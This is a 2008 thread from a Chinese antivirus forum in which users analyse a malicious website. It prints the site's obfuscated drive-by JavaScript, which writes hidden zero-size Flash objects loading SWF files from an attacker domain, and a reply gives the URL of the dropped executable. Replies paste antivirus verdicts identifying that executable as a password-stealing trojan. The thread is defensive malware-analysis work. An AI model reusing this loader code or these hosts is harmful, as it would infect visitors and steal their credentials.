查看: 14850|回复: 25
收起左侧

[已鉴定] http://1.51xj.net

 关闭 [复制链接]
qigang
发表于 2008-6-2 22:29:19 | 显示全部楼层 |阅读模式
Log is generated by FreShow.
[wide]http://1.51xj.net
    [frame]http://daima.ling8888.cn/newunion_3.htm?id=1337&key=mn758
        [script]http://daima.ling8888.cn/UnionCode_3.js
        [script]http://s54.cnzz.com/stat.php?id=412950&web_id=412950&online=1&show=line
            [script]http://222.77.187.9/online.php?id=412950&online=1&show=line
    [script]http://s138.cnzz.com/stat.php?id=841333&web_id=841333
    [script]http://z.link88.be/zclick.js
    [frame]http://www.ninig.cn/bak/1035.htm
        [frame]http://www.ninig.cn/bak/../zzz.htm
        [script]http://s86.cnzz.com/stat.php?id=892252&web_id=892252


<html>
<script>
window["onerror"]=function(){return true;}
function init(){window["status"]="";}window["onload"] = init;
if(window["document"]["cookie"]["indexOf"]("play=")==-1)
{
var MLDV1=new window["Date"]();
MLDV1["setTime"](MLDV1["getTime"]()+24*60*60*1000);
window["document"]["cookie"]="play=Yes;path=/;expires="+MLDV1["toGMTString"]();
if(navigator["userAgent"]["toLowerCase"]()["indexOf"]("msie")>0)
{
window["document"]["write"]('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
window["document"]["write"]('<param name="allowScriptAccess" value="sameDomain"/>');
window["document"]["write"]('<param name="movie" value="http://www.re159.cn/4561.swf"/>');
window["document"]["write"]('<param name="quality" value="high"/>');
window["document"]["write"]('<param name="bgcolor" value="#ffffff"/>');
window["document"]["write"]('<embed src=http://www.re159.cn/4561.swf"/>');
window["document"]["write"]('</object>');
}
else{window["document"]["write"]("<EMBED src=http://www.re159.cn/4562.swf width=0 height=0>");}
}
</script>
<html>



红色部分嗅探不到,高手支援!
冷冷
发表于 2008-6-2 22:38:02 | 显示全部楼层
htp://www.re159.cn/ms.exe

ms.rar

52.85 KB, 下载次数: 156

Palkia
发表于 2008-6-2 22:40:27 | 显示全部楼层
病毒        2008-06-02  22:40:29        C:\Documents and Settings\Administrator\桌面\ms.rar\ms.exe        Win32.Troj.Agent.cd.200704        跳过,未处理
qigang
 楼主| 发表于 2008-6-2 22:43:25 | 显示全部楼层

3/0

RS20.47.02未杀!
HC303
发表于 2008-6-2 22:45:11 | 显示全部楼层
When accessing data from the URL, "http://bbs.kafan.cn/attachment.php?aid=277017&k=fd19714ad676a904bdaba0ddcb00990f&t=1212417864"
a virus or unwanted program 'HEUR/Malware' [heuristic] was found.
Action taken: Blocked file
HC303
发表于 2008-6-2 23:06:39 | 显示全部楼层
The file 'ms.exe' has been determined to be 'MALWARE'. Detection is added to our virus definition file (VDF) starting with version 7.00.04.127. Please note that Avira's proactive heuristic detection module AHeAD detected this threat up front without the latest VDF update as: TR/PSW.OnlineGames.alln.2.


--------------------------------------------------------------------------------
电影结束了
发表于 2008-6-2 23:10:31 | 显示全部楼层
对象: ms.exe
        在压缩档案里: F:\ms.rar
        Status: 已发现病毒
        病毒: Trojan.Crypt.Delf.D (BD 引擎)
Palkia
发表于 2008-6-2 23:12:26 | 显示全部楼层
MS我开着金山进去没报?
ALEXBLAIR
发表于 2008-6-2 23:18:50 | 显示全部楼层
转了一圈,没发现什么奇怪的地方
除了那个网站的名字劲爆了点~~
不过,那个flash明显十分的可疑,可惜目前还没有什么杀毒软件能够认出他
反编译的时候出现问题,ie调试的时候,发现文件缺少对象,可能在二次制作的时候出了问题。~~~
qwer9909
发表于 2008-6-2 23:19:59 | 显示全部楼层
20080602 151939        扫描 '单击右键扫描' 已启动。
20080602 151939        在 'C:\Documents and Settings\Administrator\桌面\ms.rar\ms.exe' 中检测到 病毒/间谍软件'Mal/Behav-156'。清除不可用。
20080602 151939        感染病毒的文件"C:\Documents and Settings\Administrator\桌面\ms.rar"已删除。
20080602 151939        扫描 '单击右键扫描' 已完成。
20080602 151939        扫描'单击右键扫描'摘要:
                已扫描项目:6
                错误:0
                已隔离项目:0
                已处置项目:1
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 07:39 , Processed in 0.128397 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表